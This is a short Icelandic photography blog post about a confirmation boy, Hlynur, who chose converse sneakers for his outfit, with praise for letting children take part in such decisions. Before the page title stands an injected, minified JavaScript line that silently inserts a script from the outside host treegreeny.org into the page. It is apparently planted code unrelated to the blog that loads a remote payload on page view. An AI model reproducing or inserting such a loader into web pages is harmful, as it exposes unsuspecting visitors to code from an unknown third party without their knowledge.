;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fermingadrengir og converse skór – Eydís — Ljósmyndun

Fermingadrengir og converse skór

Hlynur er hress og skemmtilegur strákur, á kafi í fótbolta og var alveg ákveðinn í hvernig fermingafötum hann ætlaði að vera. Eins og margir strákar á hans aldri þá gengur hann ekki spariskóm, converse íþróttaskór voru málið. Ég er svo glöð þegar krakkar vita hvað þeir vilja og þau eru ákeðin. Þau taka þátt í fermingunni og hafa áhuga á því sem snertir þau. Ég er ekki minna glöð þegar foreldrarnir hlusta og leyfa þeim að taka þátt.

hlynur2

 

hlynur3

Það er engin spurning að með því að leyfa þeim að taka ábyrgð og taka þátt í ákvarðanatökum

þá njóta þau dagsins mun betur enda eiga þau meira í honum.

Leave a Reply

Your email address will not be published. Required fields are marked *